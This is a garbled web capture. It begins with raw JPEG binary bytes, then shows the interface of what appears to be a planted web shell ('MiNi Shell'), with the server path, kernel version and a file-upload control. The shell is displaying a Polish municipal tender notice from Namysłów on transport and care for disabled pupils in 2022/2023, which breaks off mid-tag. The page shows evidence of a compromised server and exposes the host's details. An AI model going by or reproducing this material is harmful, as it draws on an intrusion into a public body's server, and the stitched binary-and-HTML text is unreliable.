JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220802/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220802/0028711301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Zapewnienie uczniom niepełnosprawnym bezpłatnego transportu i opieki w czasie przewozu do placówek oświatowych w roku szkolnym 2022/2023. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Namysłów, reprezentowana przez Burmistrza Namysłowa</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 531413159</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Stanisława Dubois 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Namysłów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">46-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL523 - Nyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@namyslow.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.namyslow.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zapewnienie uczniom niepełnosprawnym bezpłatnego transportu i opieki w czasie przewozu do placówek oświatowych w roku szkolnym 2022/2023. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f27b6e15-1173-11ed-a35f-e2885ab918a3</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00287113</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-08-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00011176/13/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.13 Zapewnienie uczniom niepełnosprawnym bezpłatnego transportu i opieki w czasie przewozu do placówek oświatowych w roku szkolnym 2022/2023</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.bip.namyslow.eu; https://namyslow.ezamawiajacy.pl/app/login <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://namyslow.ezamawiajacy.pl/app/login</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne zgodnie z punktem 8 i 12 SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z dnia 04.05.2016 r., str. 1), dalej „RODO”, informuję, że:<br/>	administratorem Pani/Pana danych osobowych jest Gmina Namysłów reprezentowana przez Burmistrza Namysłowa, z którym można się skontaktować poprzez: korespondencyjnie: ul. Stanisława Dubois 3, 46-100 Namysłów, adres e-mail: urzad.miejski@namyslow.eu, numer telefonu +48 77 41 90 300;<br/>	inspektorem ochrony danych osobowych w Gminie Namysłów jest Pan Wojciech Olender z którym można się skontaktować poprzez: korespondencyjnie: ul. Stanisława Dubois 3, 46-100 Namysłów, adres e-mail: iod@namyslow.eu, numer telefonu 887 818 800;<br/>	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. C RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego na „zapewnienie uczniom niepełnosprawnym bezpłatnego transportu i opieki w czasie przewozu do placówek oświatowych w roku szkolnym 2022/2023”, nr ZP.271.86.2022.AD, prowadzonym w trybie podstawowym (art. 275 pkt 1 ustawy Pzp);<br/>	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2021 r., poz. 1129, z późn. zm.);<br/>	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres co najmniej 7 lat od dnia wpływu ostatniej płatności na konto beneficjenta (płatności na realizację projektu), a jeżeli zobowiązania wskazane w ofercie i umowie przekroczą w/w przedział czasowy, okres przechowywania obejmuje ten termin;<br/>	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO;<br/>	posiada Pani/Pan:<br/>	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego <br/>Unii Europejskiej lub państwa członkowskiego);<br/>	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>	nie przysługuje Pani/Panu:<br/>	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>	prawo do przenoszenia danych osobowych, o których mowa w art. 20 RODO;<br/>	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. Pozostałe informacje zostały zawarte w punkcie 20 dodatkowych postanowień SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Pozostałe informacje zostały zawarte w punkcie 20 dodatkowych postanowień SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.86.2022.AD</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa związana z realizacją obowiązku określonego w art. 39 ust. 4 ustawy z dnia 14 grudnia 2016 r. – Prawo oświatowe, polegająca na dowożeniu i opiece w czasie przewozu do:<br/>Część I<br/>•	szkoły umożliwiającej realizację obowiązku szkolnego i obowiązku nauki, tj. Zespołu Niepublicznych Szkół im. „Alicji po drugiej stronie lustra” w Kup, ul. Karola Miarki 10-12, 46-082 Kup – jednego ucznia z niepełnosprawnością sprzężoną: niepełnosprawnością intelektualną w stopniu umiarkowanym oraz autyzmem, w tym z zespołem Aspergera mieszkającego w Namysłowie oraz jednego ucznia z niepełnosprawnością sprzężoną: niepełnosprawnością intelektualną w stopniu umiarkowanym oraz autyzmem, w tym z zespołem Aspergera mieszkającego w Jastrzębiu.<br/>Wykonawca zobowiązany jest zawieźć uczniów w godzinach rannych (ustalonych z rodzicami uczniów) do szkoły, a następnie przywieźć po zajęciach z powrotem do domu. Wykonawca zobowiązany jest do świadczenia usługi terminowo i punktualnie.<br/>W ramach usługi Wykonawca zobowiązany jest do zapewnienia stałej opieki nad przewożonymi uczniami. Funkcję opiekuna może sprawować wyłącznie osoba pełnoletnia, mająca zdolność do czynności prawnych. Funkcji opiekuna nie może pełnić kierowca pojazdu, którym przewożeni będą uczniowie. Osoba pełniąca funkcję opiekuna zobowiązana będzie przyjąć uczniów od rodzica/rodziców, sprawować nad nimi opiekę w czasie przewozu i przekazać, po przyjeździe do szkoły, pod opiekę nauczycielowi lub opiekunowi w szkole, następnie po zakończonych zajęciach odebrać uczniów od nauczyciela, sprawować opiekę nad nimi w czasie przewozu i po powrocie przekazać rodzicowi/rodzicom. Osoba pełniąca funkcję opiekuna winna być wyposażona w środek łączności, np. telefon komórkowy, umożliwiający kontakt z rodzicem/rodzicami uczniów.<br/>W przypadku czasowej niemożności świadczenia usług przewozowych, w uzasadnionych przypadkach (np. w czasie choroby lub awarii pojazdu), Wykonawca zobowiązuje się do niezwłocznego zorganizowania zastępstwa zapewniającego równorzędny poziom usług.<br/>Wykonawca nie może powierzyć świadczenia usługi będącej przedmiotem zamówienia podwykonawcy, bez uprzedniej pisemnej zgody Zamawiającego.<br/>Wykonawca zobowiązuje się ponadto do:<br/>1)	zapewnienia środka transportu, który spełnia wymagania określone w przepisach ustawy – Prawo o ruchu drogowym i innych przepisach związanych z przewozem osób, w tym umożliwiającego przewiezienie wózka inwalidzkiego w przypadku zamówienia, o którym mowa w części II (dziecko z niepełnosprawnością może być przewożone na odpowiednio zabezpieczonym wózku inwalidzkim lub w fotelu pasażera, a wózek w bagażniku);<br/>2)	posiadania aktualnego przeglądu technicznego pojazdu;<br/>3)	posiadania aktualnego ubezpieczenia od odpowiedzialności cywilnej oraz ubezpieczenia od Następstw Nieszczęśliwych Wypadków kierowcy i pasażerów (NNW),<br/>4)	zachowania w tajemnicy danych osobowych ucznia/uczniów, zgodnie z ustawą z dnia 10 maja 2018 r. o ochronie danych osobowych. <br/>Wykonawca ponosi odpowiedzialność za działania osób, którym powierzy wykonanie określonych czynności związanych z wykonaniem przedmiotu zamówienia. <br/>Z tytułu świadczenia usługi związanej z przedmiotem zamówienia Wykonawca otrzymywać będzie wynagrodzenie za każdy dzień świadczenia usługi. <br/>W przypadku ograniczenia w funkcjonowaniu lub zamknięcia jednostek oświatowych, w związku z uzasadnionymi okolicznościami zagrażającymi życiu lub zdrowiu dzieci i uczniów niezależnymi od Zamawiającego oraz Wykonawcy, a tym samym zaprzestania przez Wykonawcę przewozu uczniów do placówki oświatowej, Wykonawca otrzymywać będzie wynagrodzenie w wysokości 30 % wynagrodzenia umownego, za dni w których pozostawał w gotowości do świadczenia usługi będącej przedmiotem zamówienia.<br/>Wykonawca nie otrzyma wynagrodzenia na dni nieświadczenia usługi z przyczyn leżących po stronie rodziców uczniów (np. choroba dziecka).<br/>Wynagrodzenie ustalane będzie odrębnie za każdy miesiąc kalendarzowy.<br/>Faktura za usługę powinna być wystawiona w terminie do 5 roboczego dnia miesiąca następującego po miesiącu rozliczeniowym. <br/>Zamawiający zastrzega sobie prawo do rutynowej kontroli umowy, w tym sposobu wykonywania usługi będącej przedmiotem zamówienia, a także stanu technicznego pojazdów oraz trzeźwości kierowców przy pomocy odpowiednio uprawnionych do tego służb (Policja, Inspekcja Transportu Drogowego).<br/>Zamawiający dopuszcza możliwość składania ofert częściowych. Zamówienie zostało podzielone na 3 części. Każdy Wykonawca może złożyć ofertę na dowolną liczbę części. Zamawiający nie ogranicza liczby części, które udzieli jednemu Wykonawcy. <br/>Szacunkowa liczba dni świadczenia usług – 186 dni. Wykonawca będzie rozliczał się z Zamawiającym wg faktycznej liczby dni świadczenia usług. Zamawiający zobowiązany jest wykorzystać co najmniej 60% wartości brutto umowy.<br/>Zamawiający zapłaci Wykonawcy wynagrodzenie za faktyczne dni świadczenia usług zrealizowanych na podstawie niniejszej umowy, stanowiące sumę iloczynów cen jednostkowych za jeden dzień świadczenia usług oraz liczbę dni świadczenia usług. <br/>Wykonawca zobowiązany jest zrealizować zamówienie na zasadach i warunkach opisanych w SWZ i ofercie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60140000-1 - Nieregularny transport osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-09-01 do 2023-06-23</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji na wprowadzenie autobusu zastępczego w przypadku awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa związana z realizacją obowiązku określonego w art. 39 ust. 4 ustawy z dnia 14 grudnia 2016 r. – Prawo oświatowe, polegająca na dowożeniu i opiece w czasie przewozu do:<br/>Część II<br/>•	szkoły umożliwiającej realizację zespołowych zajęć rewalidacyjno-wychowawczych, tj. Zespołu Szkół Specjalnych w Brzegu, ul. Mossora 4, 49-300 Brzeg – jednego ucznia niepełnosprawnością intelektualną w stopniu głębokim mieszkającego w Namysłowie (poruszającego się na wózku inwalidzkim).<br/>Wykonawca zobowiązany jest zawieźć uczniów w godzinach rannych (ustalonych z rodzicami uczniów) do szkoły, a następnie przywieźć po zajęciach z powrotem do domu. Wykonawca zobowiązany jest do świadczenia usługi terminowo i punktualnie.<br/>W ramach usługi Wykonawca zobowiązany jest do zapewnienia stałej opieki nad przewożonymi uczniami. Funkcję opiekuna może sprawować wyłącznie osoba pełnoletnia, mająca zdolność do czynności prawnych. Funkcji opiekuna nie może pełnić kierowca pojazdu, którym przewożeni będą uczniowie. Osoba pełniąca funkcję opiekuna zobowiązana będzie przyjąć uczniów od rodzica/rodziców, sprawować nad nimi opiekę w czasie przewozu i przekazać, po przyjeździe do szkoły, pod opiekę nauczycielowi lub opiekunowi w szkole, następnie po zakończonych zajęciach odebrać uczniów od nauczyciela, sprawować opiekę nad nimi w czasie przewozu i po powrocie przekazać rodzicowi/rodzicom. Osoba pełniąca funkcję opiekuna winna być wyposażona w środek łączności, np. telefon komórkowy, umożliwiający kontakt z rodzicem/rodzicami uczniów.<br/>W przypadku czasowej niemożności świadczenia usług przewozowych, w uzasadnionych przypadkach (np. w czasie choroby lub awarii pojazdu), Wykonawca zobowiązuje się do niezwłocznego zorganizowania zastępstwa zapewniającego równorzędny poziom usług.<br/>Wykonawca nie może powierzyć świadczenia usługi będącej przedmiotem zamówienia podwykonawcy, bez uprzedniej pisemnej zgody Zamawiającego.<br/>Wykonawca zobowiązuje się ponadto do:<br/>1)	zapewnienia środka transportu, który spełnia wymagania określone w przepisach ustawy – Prawo o ruchu drogowym i innych przepisach związanych z przewozem osób, w tym umożliwiającego przewiezienie wózka inwalidzkiego w przypadku zamówienia, o którym mowa w części II (dziecko z niepełnosprawnością może być przewożone na odpowiednio zabezpieczonym wózku inwalidzkim lub w fotelu pasażera, a wózek w bagażniku);<br/>2)	posiadania aktualnego przeglądu technicznego pojazdu;<br/>3)	posiadania aktualnego ubezpieczenia od odpowiedzialności cywilnej oraz ubezpieczenia od Następstw Nieszczęśliwych Wypadków kierowcy i pasażerów (NNW),<br/>4)	zachowania w tajemnicy danych osobowych ucznia/uczniów, zgodnie z ustawą z dnia 10 maja 2018 r. o ochronie danych osobowych. <br/>Wykonawca ponosi odpowiedzialność za działania osób, którym powierzy wykonanie określonych czynności związanych z wykonaniem przedmiotu zamówienia. <br/>Z tytułu świadczenia usługi związanej z przedmiotem zamówienia Wykonawca otrzymywać będzie wynagrodzenie za każdy dzień świadczenia usługi. <br/>W przypadku ograniczenia w funkcjonowaniu lub zamknięcia jednostek oświatowych, w związku z uzasadnionymi okolicznościami zagrażającymi życiu lub zdrowiu dzieci i uczniów niezależnymi od Zamawiającego oraz Wykonawcy, a tym samym zaprzestania przez Wykonawcę przewozu uczniów do placówki oświatowej, Wykonawca otrzymywać będzie wynagrodzenie w wysokości 30 % wynagrodzenia umownego, za dni w których pozostawał w gotowości do świadczenia usługi będącej przedmiotem zamówienia.<br/>Wykonawca nie otrzyma wynagrodzenia na dni nieświadczenia usługi z przyczyn leżących po stronie rodziców uczniów (np. choroba dziecka).<br/>Wynagrodzenie ustalane będzie odrębnie za każdy miesiąc kalendarzowy.<br/>Faktura za usługę powinna być wystawiona w terminie do 5 roboczego dnia miesiąca następującego po miesiącu rozliczeniowym. <br/>Zamawiający zastrzega sobie prawo do rutynowej kontroli umowy, w tym sposobu wykonywania usługi będącej przedmiotem zamówienia, a także stanu technicznego pojazdów <br/>oraz trzeźwości kierowców przy pomocy odpowiednio uprawnionych do tego służb (Policja, Inspekcja Transportu Drogowego).<br/>Zamawiający dopuszcza możliwość składania ofert częściowych. Zamówienie zostało podzielone na 3 części. Każdy Wykonawca może złożyć ofertę na dowolną liczbę części. Zamawiający nie ogranicza liczby części, które udzieli jednemu Wykonawcy. <br/>Szacunkowa liczba dni świadczenia usług – 186 dni. Wykonawca będzie rozliczał się z Zamawiającym wg faktycznej liczby dni świadczenia usług. Zamawiający zobowiązany jest wykorzystać co najmniej 60% wartości brutto umowy.<br/>Zamawiający zapłaci Wykonawcy wynagrodzenie za faktyczne dni świadczenia usług zrealizowanych na podstawie niniejszej umowy, stanowiące sumę iloczynów cen jednostkowych za jeden dzień świadczenia usług oraz liczbę dni świadczenia usług. <br/>Wykonawca zobowiązany jest zrealizować zamówienie na zasadach i warunkach opisanych w SWZ i ofercie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60140000-1 - Nieregularny transport osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-09-01 do 2023-06-23</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span 